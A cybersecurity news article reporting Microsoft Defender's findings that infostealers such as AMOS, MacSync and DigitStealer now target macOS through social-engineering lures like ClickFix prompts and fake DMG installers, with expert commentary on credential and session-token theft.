Security Operations, SOC, Identity, Ransomware, Malware

Infostealer threats move beyond Windows to target macOS machines

Close-up of Apple MacOS Dock with Finder icon selected and mouse cursor hovering

(Adobe Stock)

Infostealer threats have been observed moving beyond traditional Windows-focused campaigns to targeting macOS environments.

In a Feb. 2 blog post, the Microsoft Defender Security Research Team said these macOS campaigns leverage cross-platform languages such as Python, and abuse trusted platforms and utilities to silently deliver credential stealing malware.

The Microsoft Defender team observed mcOS targeted infostealer campaigns since late 20205 using a variety of social engineering techniques, including ClickFix-style prompts and malicious DMG installers. These campaigns then deploy macOS-specific infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer, known as AMOS.

Shane Barney, chief information security officer at Keeper Security, said infostealer campaigns like this work because they target the point where most environments are still overconfident: what happens after access gets granted.

Barney said these attackers are not trying to defeat macOS security controls: they are deliberately avoiding that path by convincing users to install software or run commands that appear legitimate.

“Once that step occurs, the operating system largely fades into the background,” said Barney. “By relying on native tools, scripting languages like Python, and trusted distribution channels, attackers blend into normal activity and minimize detection. The real objective is to quietly collect credentials, session tokens and developer secrets that can be reused later.”

Robert Coles, senior cybersecurity engineer at Black Duck, added that infostealers are evolving as one of the most effective initial access tools used by today’s threat actors. Once considered a Windows-only issue, Coles said the threat now operates across Windows and macOS, leveraging cross-platform languages such as Python.

“This is not your typical attack, using a software vulnerability,” said Coles. “Instead, the user is persuaded into running a trusted system utility to ‘fix’ something or run a trojanized installer that appears to be a legitimate application."

Coles pointed out that malvertising, phishing, and fake software updates are typically used to deliver the infostealers. Once a user is convinced to run the compromised application, Coles said the app harvests browser credentials and cookies and session tokens to bypass multi-factor authentication (MFA), financial and crypto data, and even gather cloud, developer, and API credentials.

“Using stolen credentials can lead to account takeovers across SaaS and cloud platforms,” said Coles. “Follow-on attacks could also occur, such as ransomware and business email compromise.”

Related

Related Events

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

Related Terms

AdwareBiometricsBlue TeamCertificate-Based AuthenticationCold Warm Hot Disaster Recovery SiteCountermeasureDigest AuthenticationDigital CertificateDisaster Recovery Plan (DRP)Discretionary Access Control (DAC)

You can skip this ad in 5 seconds